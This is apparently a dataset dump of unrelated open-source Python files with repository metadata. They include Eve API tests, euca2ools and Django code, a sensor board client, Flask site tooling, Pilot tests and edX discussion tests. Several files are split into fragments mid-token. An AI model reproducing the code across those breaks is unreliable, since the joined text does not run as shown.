self.assertTrue(ETAG not in r)
def test_ifmatch_bad_etag(self):
_, status = self.patch(self.item_id_url,
data={'key1': 'value1'},
headers=[('If-Match', 'not-quite-right')])
self.assert412(status)
def test_unique_value(self):
# TODO
# for the time being we are happy with testing only Eve's custom
# validation. We rely on Cerberus' own test suite for other validation
# unit tests. This test also makes sure that response status is
# syntatically correcy in case of validation issues.
# We should probably test every single case as well (seems overkill).
r, status = self.patch(self.item_id_url,
data={"ref": "%s" % self.alt_ref},
headers=[('If-Match', self.item_etag)])
self.assertValidationErrorStatus(status)
self.assertValidationError(r, {'ref': "value '%s' is not unique" %
self.alt_ref})
def test_patch_string(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_integer(self):
field = "prog"
test_value = 9999
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_list_as_array(self):
field = "role"
test_value = ["vendor", "client"]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertTrue(set(test_value).issubset(db_value))
def test_patch_rows(self):
field = "rows"
test_value = [
{'sku': 'AT1234', 'price': 99},
{'sku': 'XF9876', 'price': 9999}
]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
for test_item in test_value:
self.asser
|
tTrue(test_item in db_value)
d
|
ef test_patch_list(self):
field = "alist"
test_value = ["a_string", 99]
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_dict(self):
field = "location"
test_value = {'address': 'an address', 'city': 'a city'}
changes = {field: test_value}
original_city = []
def keep_original_city(resource_name, updates, original):
original_city.append(original['location']['city'])
self.app.on_update += keep_original_city
self.app.on_updated += keep_original_city
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
self.assertEqual(original_city[0], original_city[1])
def test_patch_datetime(self):
field = "born"
test_value = "Tue, 06 Nov 2012 10:33:31 GMT"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_objectid(self):
field = "tid"
test_value = "4f71c129c88e2018d4000000"
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_null_objectid(self):
# verify that #341 is fixed.
field = "tid"
test_value = None
changes = {field: test_value}
r = self.perform_patch(changes)
db_value = self.compare_patch_with_get(field, r)
self.assertEqual(db_value, test_value)
def test_patch_defaults(self):
field = "ref"
test_value = "1234567890123456789012345"
changes = {field: test_value}
r = self.perform_patch(changes)
self.assertRaises(KeyError, self.compare_patch_with_get, 'title', r)
def test_patch_defaults_with_post_override(self):
field = "ref"
test_value = "1234567890123456789012345"
r = self.perform_patch_with_post_override(field, test_value)
self.assert200(r.status_code)
self.assertRaises(KeyError, self.compare_patch_with_get, 'title',
json.loads(r.get_data()))
def test_patch_multiple_fields(self):
fields = ['ref', 'prog', 'role']
test_values = ["9876543210987654321054321", 123, ["agent"]]
changes = {"ref": test_values[0], "prog": test_values[1],
"role": test_values[2]}
r = self.perform_patch(changes)
db_values = self.compare_patch_with_get(fields, r)
for i in range(len(db_values)):
self.assertEqual(db_values[i], test_values[i])
def test_patch_with_post_override(self):
# a POST request with PATCH override turns into a PATCH request
r = self.perform_patch_with_post_override('prog', 1)
self.assert200(r.status_code)
def test_patch_internal(self):
# test that patch_internal is available and working properly.
test_field = 'ref'
test_value = "9876543210987654321098765"
data = {test_field: test_value}
with self.app.test_request_context(self.item_id_url):
r, _, _, status = patch_internal(
self.known_resource, data, concurrency_check=False,
**{'_id': self.item_id})
db_value = self.compare_patch_with_get(test_field, r)
self.assertEqual(db_value, test_value)
self.assert200(status)
def test_patch_etag_header(self):
# test that Etag is always includer with response header. See #562.
changes = {"ref": "1234567890123456789012345"}
headers = [('Content-Type', 'application/json'),
('If-Match', self.item_etag)]
|
jhajek/euca2ools
|
euca2ools/commands/ec2/describebundletasks.py
|
Python
|
bsd-2-clause
| 2,642
| 0
|
# Copyright 2009-2013 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of condi
|
tions and
|
the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from euca2ools.commands.ec2 import EC2Request
from requestbuilder import Arg, Filter
class DescribeBundleTasks(EC2Request):
DESCRIPTION = 'Describe current instance-bundling tasks'
ARGS = [Arg('BundleId', metavar='BUNDLE', nargs='*',
help='limit results to specific bundle tasks')]
FILTERS = [Filter('bundle-id', help='bundle task ID'),
Filter('error-code',
help='if the task failed, the error code returned'),
Filter('error-message',
help='if the task failed, the error message returned'),
Filter('instance-id', help='ID of the bundled instance'),
Filter('progress', help='level of task completion, in percent'),
Filter('s3-bucket',
help='bucket where the image will be stored'),
Filter('s3-prefix', help='beginning of the bundle name'),
Filter('start-time', help='task start time'),
Filter('state', help='task state'),
Filter('update-time', help='most recent task update time')]
LIST_TAGS = ['bundleInstanceTasksSet']
def print_result(self, result):
for task in result.get('bundleInstanceTasksSet', []):
self.print_bundle_task(task)
|
servee/django-servee-oldcontrib
|
oldcontrib/media/document/forms.py
|
Python
|
bsd-3-clause
| 190
| 0.010526
|
from django import forms
from oldcontrib.media.document.models import Document
class Document
|
Upload(forms.ModelForm):
class Meta:
model = Document
|
fields = ('document',)
|
TeamProxima/predictive-fault-tracker
|
board/board_manager.py
|
Python
|
mit
| 2,638
| 0.003412
|
import json
import socket
from comms_manager import CommsManager
from constants import *
class BoardManager:
def __init__(self, args):
self.server_address = (args.IP, args.PORT)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.sock.connect(self.server_address)
self.cm = CommsManager(args.TO, args.FROM, args.TWKEY)
def activate(self):
"""
Continuously feeds server with sensor data and responds training requests
"""
while True:
try:
|
humidity, temperature = self.cm.take_single_sample()
packet = json.dumps({'scores': {'temperature': temperature,
'humidity': humidity}})
self.sock.send(packet)
resp = self.sock.recv(1024)
|
if resp:
resp = json.loads(resp)
if resp['response'] == -1:
self.cm.send_sms(
message='There is a temperature problem at station 2. For detailed'
' info siemenshackathon://scheme.net.siemenshackathon')
self.cm.blink(2, 17)
if resp['responsesound'] == -1:
self.cm.send_sms(
message='There might be a malfunction at station 2. For detailed '
'info siemenshackathon://scheme.net.siemenshackathon')
self.cm.buzzer(2, 26)
if len([key for key, value in resp.iteritems() if key == 'train']):
# Train command makes a quick training through environment and sends
# results back
self.cm.take_sample(20, 'temperature', 'humidity')
# 'npy' field notify server for incoming training files
# Only temperature data used for ML
self.sock.send(json.dumps({'npy': 1, 'humid_file_name': HUMIDITY_DATA_FILE,
'temp_file_name': TEMPERATURE_DATA_FILE}))
fdesc = open(TEMPERATURE_DATA_FILE, 'rb')
data = fdesc.read(1024)
while data:
self.sock.send(data)
data = fdesc.read(1024)
fdesc.close()
except Exception as e:
print 'Error occurred during sending file: ', str(e)
continue
|
cacahootie/deckmaster
|
deckmaster/app/process_site.py
|
Python
|
mit
| 4,475
| 0.007374
|
"""Process `site.json` and bower package tools."""
import os
import json
import subprocess
from functools import partial
import importlib
import sys
from flask import Flask, render_template, g, redirect, current_app
from gitloader import git_show
from import_code import import_code
try:
from app import app
except ImportError:
from deckmaster.app import app
sys.path.append('.')
component_dir = 'static/components'
bower_str = 'bower install --config.directory="%s" %s > /dev/null'
def get_pkg_dir(package):
"""Join the component and package directory."""
return os.path.join(component_dir, package)
def get_pkg_main(package):
"""Check `package.json` then `bower.json` for the main included file."""
pkg = json.load(
open(os.path.join(get_pkg_dir(package), 'bower.json'))
)
if isinstance(pkg['main'],list):
return [os.path.join(get_pkg_dir(package), p) for p in pkg['main']]
else:
return os.path.join(get_pkg_dir(package), pkg['main'])
def check_pkg(package):
"""CHeck if the package exists, if not use bower to install."""
if not os.path.exists(os.path.join(component_dir, package)):
subprocess.call(
bower_str % (component_dir, package),
shell = True
)
return True
def script_or_style(path):
if path.endswith('js'):
return 'script'
elif path.endswith('css'):
return 'style'
else:
print "Script or style? " + path
def process_bower(deps):
retval = {'styles':[], 'scripts':[]}
try:
for pkg in deps['bower']:
check_pkg(pkg)
main = get_pkg_main(pkg)
if isinstance(main,list):
pkgassets = {}
for path in reversed(main):
try:
pkgassets[script_or_style(path)+'s'] = [path]
except TypeError:
pass
retval['scripts'] += pkgassets['scripts']
retval['styles'] += pkgassets['styles']
else:
retval[script_or_style(main)+'s'].append(main)
except KeyError:
pass
return retval
def process_local(deps):
retval = {'styles':[], 'scripts':[]}
try:
for path in deps['local']:
retval[script_or_style(path)+'s'].append(path)
except KeyError:
pass
return retval
def process_deps(deps):
"""Process scrip
|
t element in the config for local vs bower components."""
local, bower = process_local(deps), process_bowe
|
r(deps)
retval = {}
for tag in local:
retval[tag] = local[tag] + bower[tag]
return retval
def process_route(route):
if not route.get('view'):
def route_handler(revid = None, path = None):
g.revid = revid
try:
return render_template(
'html/base.html', **process_deps(route['deps'])
)
except AttributeError:
return 'Not Found', 404
return route_handler
mname, fname = route['view'].rsplit('.', 1)
module = importlib.import_module(mname)
viewfunc = getattr(module, fname)
def route_handler(revid = None, path = None):
if revid is not None:
codestr = git_show('./views.py', revid)
mod = import_code(codestr, mname)
return getattr(mod,fname)()
return viewfunc()
return route_handler
def lazy_router(revid, path = None):
g.revid = revid
if path is None:
path = ''
if not path.startswith('/'):
path = '/' + path
cfgstr = git_show('./site.json', revid)
try:
return process_route(json.loads(cfgstr)[path])(revid, path)
except KeyError:
print cfgstr
def process_site(site = None, revid = None):
"""Process `site.json` based on the config and CLI options."""
if site is None:
try:
site = json.load(open('site.json'))
except IOError:
return []
if 'deps' in site:
return [
('/', 'index', process_route(site)),
('/<revid>/', 'index_revid', process_route(site)),
]
retval = [
('/favicon.ico', 'favicon', lambda: ''),
('/<revid>/', 'revid_lazy_index', lazy_router),
('/<revid>/<path:path>', 'revid_lazy', lazy_router),
]
for rt in site:
retval.append((rt, 'index' if rt=='/' else rt, process_route(site[rt])))
return retval
|
wkrzemien/Pilot
|
Pilot/tests/Test_Pilot.py
|
Python
|
gpl-3.0
| 4,260
| 0.006103
|
""" Test class for Pilot
"""
# pylint: disable=protected-access, missing-docstring, invalid-name, line-too-long
# imports
import unittest
import json
import stat
import sys
import os
import shutil
from Pilot.pilotTools import PilotParams
from Pilot.pilotCommands import CheckWorkerNode, ConfigureSite, NagiosProbes
class PilotTestCase(unittest.TestCase):
""" Base class for the Agents test cases
"""
def setUp(self):
# Define a local file for test, and all the necessary parameters
with open('pilot.json', 'w') as fp:
json.dump({'Setups': {'TestSetup': {'Commands': {'cetype1': 'x,y, z',
|
'cetype2': ['d', 'f']},
'CommandExtensions': 'TestExtension1,TestExtension2',
'NagiosProbes': 'Nagios1,Nagios2',
'NagiosPutURL': 'https://127.0.0.2/',
'Version': 'v1r1, v2r2'
|
}
},
'CEs': {'grid1.example.com': {'GridCEType': 'cetype1', 'Site': 'site.example.com'}},
'DefaultSetup': 'TestSetup'},
fp)
def tearDown(self):
for fileProd in [
'pilot.json',
'Nagios1',
'Nagios2',
'PilotAgentUUID',
'dev.tgz',
'pilot.out',
'123.txt',
'testing.tgz']:
try:
os.remove(fileProd)
except OSError:
pass
try:
shutil.rmtree('ReplacementCode')
except OSError:
pass
class CommandsTestCase(PilotTestCase):
""" Test case for each pilot command
"""
def test_InitJSON(self):
""" Test the pilot.json and command line parsing
"""
sys.argv[1:] = ['--Name', 'grid1.example.com', '--commandOptions', 'a=1,b=2', '-Z', 'c=3']
pp = PilotParams()
self.assertEqual(pp.commands, ['x', 'y', 'z'])
self.assertEqual(pp.commandExtensions, ['TestExtension1', 'TestExtension2'])
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
sys.argv[1:] = ['--Name', 'grid1.example.com',
'--commandOptions', 'a = 1, b=2', '-Z', ' c=3'] # just some spaces
pp = PilotParams()
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
sys.argv[1:] = ['--Name', 'grid1.example.com',
'--commandOptions=a = 1, b=2', '-Z', ' c=3'] # spaces and '=''
pp = PilotParams()
self.assertEqual(pp.commandOptions['a'], '1')
self.assertEqual(pp.commandOptions['b'], '2')
self.assertEqual(pp.commandOptions['c'], '3')
def test_CheckWorkerNode(self):
""" Test CheckWorkerNode command
"""
pp = PilotParams()
cwn = CheckWorkerNode(pp)
res = cwn.execute()
self.assertEqual(res, None)
def test_ConfigureSite(self):
""" Test ConfigureSite command
"""
pp = PilotParams()
pp.configureScript = 'echo'
cs = ConfigureSite(pp)
res = cs.execute()
self.assertEqual(res, None)
def test_NagiosProbes(self):
""" Test NagiosProbes command
"""
pp = PilotParams()
nagios = NagiosProbes(pp)
with open('Nagios1', 'w') as fp:
fp.write('#!/bin/sh\necho 123\n')
os.chmod('Nagios1', stat.S_IRWXU)
with open('Nagios2', 'w') as fp:
fp.write('#!/bin/sh\necho 567\n')
os.chmod('Nagios2', stat.S_IRWXU)
nagios.execute()
self.assertEqual(nagios.nagiosProbes, ['Nagios1', 'Nagios2'])
self.assertEqual(nagios.nagiosPutURL, 'https://127.0.0.2/')
#############################################################################
# Test Suite run
#############################################################################
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(PilotTestCase)
suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(CommandsTestCase))
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
# EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
DryRun/seizures
|
code/dataIO.py
|
Python
|
gpl-3.0
| 3,438
| 0.041303
|
import scipy.io
import scipy.signal
import os
import sys
import matplotlib
import pandas as pd
import numpy as np
import random
# Load a matlab file into a data panel
# subject = Patient_N or Dog_N
# segment_type = interictal, ictal, or test
# downsample = True or False
# train_fraction = 0 < # <1, fraction of data to split into training and internal testing. This is ignored if segment_type = test.
def LoadMAT(subject, downsample):
dir = '/Users/dryu/Documents/DataScience/Seizures/data/clips/'+ subject + '/'
dict = {}
#load files in numerical order
files = os.listdir(dir)
files2 =[]
for i in range(len(files)):
qp = files[i].rfind('_') +1
files2.append(
|
files[i][0:qp] + (10-len(files[i][files[i].rfind('_')+1:]) )*'0' + files[i][qp:] )
#print len(files), len(files2)
t = {key:value for key, value in zip(files2,files)}
files2 = t.keys()
files2.sort()
f = [t[i] for i in files2]
j = 0
for i in f:
seg = i[i.rfind('_')+1 : i.
|
find('.mat')] # Number of segment, e.g. Dog_1_interictal_segment_250.mat => 250
segtype = i[i[0:i.find('_segment')].rfind('_')+1: i.find('_segment')] # Type of segment: ictal, interictal, test
d = scipy.io.loadmat(dir+i)
if j==0:
cols = range(len(d['channels'][0,0]))
cols = cols +['time']
if segtype == 'interictal' or segtype == "test":
l = -3600.0#np.nan
else:
#print i
l = d['latency'][0]
df = pd.DataFrame(np.append(d['data'].T, l+np.array([range(len(d['data'][1]))]).T/d['freq'][0], 1 ), index=range(len(d['data'][1])), columns=cols)
if downsample:
if np.round(d['freq'][0]) == 5000:
df = df.groupby(lambda x: int(np.floor(x/20.0))).mean()
if np.round(d['freq'][0]) == 500:
df = df.groupby(lambda x: int(np.floor(x/2.0))).mean()
if np.round(d['freq'][0]) == 400:
df = df.groupby(lambda x: int(np.floor(x/2.0))).mean()
df['time'] = df['time'] - (df['time'][0]-np.floor(df['time'][0]))*(df['time'][0] > 0)
dict.update({segtype+'_'+seg : df})
j = j +1
data = pd.Panel(dict)
return data
def MATToPickle(subject, downsample):
print "Welcome to MATToPickle(" + subject + ", ",
if downsample:
print "True",
else:
print "False",
print ")"
pickle_directory = "/Users/dryu/Documents/DataScience/Seizures/data/pickles/"
pickle_filename = subject
if downsample:
pickle_filename += "_downsampled"
pickle_filename = pickle_filename + ".pkl"
SavePanelAsPickle(LoadMAT(subject, downsample), pickle_filename)
def SavePanelAsPickle(data, pickle_filename):
data.to_pickle(pickle_filename)
def LoadPanelFromPickle(subject, downsample):
pickle_directory = "/Users/dryu/Documents/DataScience/Seizures/data/pickles/"
pickle_filename = subject
if downsample:
pickle_filename += "_downsampled"
pickle_filename += ".pkl"
return pd.read_pickle(pickle_filename)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description = 'Process input data into pandas pickles')
parser.add_argument('subjects', type=str, help='Subject, or all to do all subjects')
parser.add_argument('--downsample', action='store_true', help='Downsample data')
args = parser.parse_args()
if args.subjects == "all":
subjects = ['Dog_1','Dog_2', 'Dog_3', 'Dog_4', 'Patient_1', 'Patient_2', 'Patient_3', 'Patient_4','Patient_5','Patient_6','Patient_7','Patient_8',]
else:
subjects = [args.subjects]
for subject in subjects:
MATToPickle(subject, args.downsample)
|
xlqian/navitia
|
source/jormungandr/jormungandr/exceptions.py
|
Python
|
agpl-3.0
| 5,255
| 0.001713
|
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tu
|
ned using
# twitter @navitia
# channel `#navitia` on riot https://riot.im/app/#/room/#navitia:matrix.org
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
from flask import request
from werkzeug.exceptions import HTTPException
import logging
from jormungandr.new_relic import record_exception
__all__ = ["RegionNotF
|
ound", "DeadSocketException", "ApiNotFound", "InvalidArguments"]
def format_error(code, message):
error = {"error": {"id": code, "message": message}, "message": message}
return error
class RegionNotFound(HTTPException):
def __init__(self, region=None, lon=None, lat=None, object_id=None, custom_msg=None):
super(RegionNotFound, self).__init__()
self.code = 404
if custom_msg:
self.data = format_error("unknown_object", custom_msg)
return
if object_id:
if object_id.count(";") == 1:
lon, lat = object_id.split(";")
object_id = None
elif object_id[:6] == "coord:":
lon, lat = object_id[6:].split(":")
object_id = None
if not any([region, lon, lat, object_id]):
self.data = format_error("unknown_object", "No region nor " "coordinates given")
elif region and not any([lon, lat, object_id]):
self.data = format_error("unknown_object", "The region {0} " "doesn't exists".format(region))
elif not any([region, object_id]) and lon and lat:
self.data = format_error(
"unknown_object",
"No region available for the coordinates:" "{lon}, {lat}".format(lon=lon, lat=lat),
)
elif region == lon == lat is None and object_id:
self.data = format_error("unknown_object", "Invalid id : {id}".format(id=object_id))
else:
self.data = format_error("unknown_object", "Unable to parse region")
def __str__(self):
return repr(self.data['message'])
class DeadSocketException(HTTPException):
def __init__(self, region, path):
super(DeadSocketException, self).__init__()
error = 'The region {} is dead'.format(region)
self.data = format_error("dead_socket", error)
self.code = 503
class ApiNotFound(HTTPException):
def __init__(self, api):
super(ApiNotFound, self).__init__()
error = 'The api {} doesn\'t exist'.format(api)
self.data = format_error("unknown_object", error)
self.code = 404
class UnknownObject(HTTPException):
def __init__(self, msg):
super(UnknownObject, self).__init__()
error = 'The object {} doesn\'t exist'.format(msg)
self.data = format_error("unknown_object", error)
self.code = 404
class InvalidArguments(HTTPException):
def __init__(self, arg):
super(InvalidArguments, self).__init__()
self.data = format_error("unknown_object", "Invalid arguments " + arg)
self.code = 400
class UnableToParse(HTTPException):
def __init__(self, msg):
super(UnableToParse, self).__init__()
self.data = format_error("unable_to_parse", msg)
self.code = 400
class TechnicalError(HTTPException):
def __init__(self, msg):
super(TechnicalError, self).__init__()
self.data = format_error("technical_error", msg)
self.code = 500
class ConfigException(Exception):
def __init__(self, arg):
super(ConfigException, self).__init__(arg)
self.data = format_error("config_exception", "Invalid config " + arg)
self.code = 400
def log_exception(sender, exception, **extra):
logger = logging.getLogger(__name__)
message = ""
if hasattr(exception, "data") and "message" in exception.data:
message = exception.data['message']
error = '{} {} {}'.format(exception.__class__.__name__, message, request.url)
if isinstance(exception, (HTTPException, RegionNotFound)):
logger.debug(error)
if exception.code >= 500:
record_exception()
else:
logger.exception(error)
record_exception()
|
srkunze/xcache
|
setup.py
|
Python
|
mit
| 573
| 0
|
#!/usr/bin/env python
from __future__ import unicode_literals
from setuptools import setup
setup(
name='xcache',
version='0.2',
description='clean caches when needed',
author='Sven R. Kunze',
author_email='srkunze@mail.de',
url='https:/
|
/github.com/srkunze/xcache',
license='MIT',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Program
|
ming Language :: Python',
],
py_modules=['xcache'],
install_requires=[],
)
|
pombredanne/1trillioneuros
|
webapp/currency/migrations/0001_initial.py
|
Python
|
gpl-3.0
| 1,131
| 0.006189
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Currency'
db.create_table(u'currency_currency', (
('iso_code', self.gf('django.db.models.fields.CharField')(max_length=3, primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=120)),
('rate', self.gf('django.db.models.fields.FloatField')()),
))
db.send_crea
|
te_signal(u'currency', ['Currency'])
def backwards(self, orm):
# Deleting model 'Currency'
db.delete_table(u'currency_currency')
models = {
u'currency.currency': {
'Meta': {'object_name': 'Currency'},
|
'iso_code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'rate': ('django.db.models.fields.FloatField', [], {}),
}
}
complete_apps = ['currency']
|
uw-it-aca/spacescout_web
|
spacescout_web/tests.py
|
Python
|
apache-2.0
| 152
| 0
|
from d
|
jango.utils import unittest
from spacescou
|
t_web.test.not_found import NotFound404Test
from spacescout_web.test.url_filtering import URLFiltering
|
kisel/trex-core
|
scripts/astf/param_tcp_rxbufsize_8k.py
|
Python
|
apache-2.0
| 1,298
| 0.006163
|
from trex_astf_lib.api import *
# IPV6 tunable example
#
# ipv6.src_msb
# ipv6.dst_msb
# ipv6.enable
#
class Prof1():
def __init__(self):
pass
def get_profile(self, **kwargs):
# ip generator
ip_gen_c = ASTFIPGenDist(ip_range=["16.0.0.0", "16.0.0.255"], distribution="seq")
ip_gen_s = ASTFIPGenDist(ip_r
|
ange=["48.0.0.0", "48.0.255.255"], distribution="seq")
ip_gen = ASTFIPGen(glob=ASTFIPGenGlobal(ip_offset="1.0.0.0"),
dist_client=ip_gen_c,
dist_server=ip_gen_s)
c_glob_info = ASTFGlobalInfo()
c_glob_info.tcp.rxbufsize = 8*1024
c_glob_info.tcp.txbufsize = 8*1024
s_glob_info = ASTFGlobalInfo()
s_glo
|
b_info.tcp.rxbufsize = 8*1024
s_glob_info.tcp.txbufsize = 8*1024
return ASTFProfile(default_ip_gen=ip_gen,
# Defaults affects all files
default_c_glob_info=c_glob_info,
default_s_glob_info=s_glob_info,
cap_list=[
ASTFCapInfo(file="../avl/delay_10_http_browsing_0.pcap", cps=1)
]
)
def register():
return Prof1()
|
stvstnfrd/edx-platform
|
lms/djangoapps/discussion/django_comment_client/tests/test_utils.py
|
Python
|
agpl-3.0
| 78,549
| 0.002928
|
# pylint: skip-file
import datetime
import json
import sys
from unittest import mock
from unittest.mock import Mock, patch
import ddt
import pytest
from django.test import RequestFactory, TestCase
from django.urls import reverse
from edx_django_utils.cache import RequestCache
from opaque_keys.edx.keys import CourseKey
from pytz import UTC
import lms.djangoapps.discussion.django_comment_client.utils as utils
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.course_modes.tests.factories import CourseModeFactory
from common.djangoapps.student.roles import CourseStaffRole
from common.djangoapps.student.tests.factories import AdminFactory, CourseEnrollmentFactory, UserFactory
from lms.djangoapps.courseware.tabs import get_course_tab_list
from lms.djangoapps.courseware.tests.factories import InstructorFactory
from lms.djangoapps.discussion.django_comment_client.constants import TYPE_ENTRY, TYPE_SUBCATEGORY
from lms.djangoapps.discussion.django_comment_client.tests.factories import RoleFactory
from lms.djangoapps.discussion.django_comment_client.tests.unicode import UnicodeTestMixin
from lms.djangoapps.discussion.django_comment_client.tests.utils import config_course_discussions, topic_name_to_id
from lms.djangoapps.teams.tests.factories import CourseTeamFactory
from openedx.core.djangoapps.course_groups import cohorts
from openedx.core.djangoapps.course_groups.cohorts import set_course_cohorted
from openedx.core.djangoapps.course_groups.tests.helpers import CohortFactory, config_course_cohorts
from openedx.core.djangoapps.django_comment_common.comment_client.utils import (
CommentClientMaintenanceError,
perform_request
)
from openedx.core.djangoapps.django_comment_common.models import (
CourseDiscussionSettings,
DiscussionsIdMapping,
ForumsConfig,
assign_role
)
from openedx.core.djangoapps.django_comment_common.utils import (
get_course_discussion_settings,
seed_permissions_roles,
set_course_discussion_settings
)
from openedx.core.djangoapps.util.testing import ContentGroupTestCase
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.tests.django_utils import TEST_DATA_MIXED_MODULESTORE, ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory, ToyCourseFactory
class DictionaryTestCase(TestCase):
def test_extract(self):
d = {'cats': 'meow', 'dogs': 'woof'}
k = ['cats', 'dogs', 'hamsters']
expected = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
assert utils.extract(d, k) == expected
def test_strip_none(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': None}
expected = {'cats': 'meow', 'dogs': 'woof'}
assert utils.strip_none(d) == expected
def test_strip_blank(self):
d = {'cats': 'meow', 'dogs': 'woof', 'hamsters': ' ', 'yetis': ''}
expected = {'cats': 'meow', 'dogs': 'woof'}
assert utils.strip_blank(d) == expected
class AccessUtilsTestCase(ModuleStoreTestCase):
"""
Base testcase class for access and roles for the
comment client service integration
"""
CREATE_USER = False
def setUp(self):
super().setUp()
self.course = CourseFactory.create()
self.course_id = self.course.id
self.student_role = RoleFactory(name='Student', course_id=self.course_id)
self.moderator_role = RoleFactory(name='Moderator', course_id=self.course_id)
self.community_ta_role = RoleFactory(name='Community TA', course_id=self.course_id)
self.student1 = UserFactory(username='student', email='student@edx.org')
self.student1_enrollment = CourseEnrollmentFactory(user=self.student1)
self.student_role.users.add(self.student1)
self.student2 = UserFactory(username='student2', email='student2@edx.org')
self.student2_enrollment = CourseEnrollmentFactory(user=self.student2)
self.moderator = UserFactory(username='moderator', email='staff@edx.org', is_staff=True)
self.moderator_enrollment = CourseEnrollmentFactory(user=self.moderator)
self.moderator_role.users.add(self.moderator)
self.community_ta1 = UserFactory(username='community_ta1', email='community_ta1@edx.org')
self.community_ta_role.users.add(self.community_ta1)
self.community_ta2 = UserFactory(username='community_ta2', email='community_ta2@edx.org')
self.community_ta_role.users.add(self.community_ta2)
self.course_staff = UserFactory(username='course_staff', email='course_staff@edx.org')
CourseStaffRole(self.course_id).add_users(self.course_staff)
def test_get_role_ids(self):
ret = utils.get_role_ids(self.course_id)
expected = {'Moderator': [3], 'Community TA': [4, 5]}
assert ret == expected
def test_has_discussion_privileges(self):
assert not utils.has_discussion_privileges(self.student1, self.course_id)
assert not utils.has_discussion_privileges(self.student2, self.course_id)
assert not utils.has_discussion_privileges(self.course_staff, self.course_id)
assert utils.has_discussion_privileges(self.moderator, self.course_id)
assert utils.has_discussion_privileges(self.community_ta1, self.course_id)
assert utils.has_discussion_privileges(self.community_ta2, self.course_id)
def test_has_forum_access(
|
self):
ret = utils.has_forum_access('student', self.course_id, 'Student')
assert ret
ret = utils.has_forum_access('not_a_student', self.course_id, 'Student')
assert not ret
ret = utils.has_forum_access('s
|
tudent', self.course_id, 'NotARole')
assert not ret
@ddt.ddt
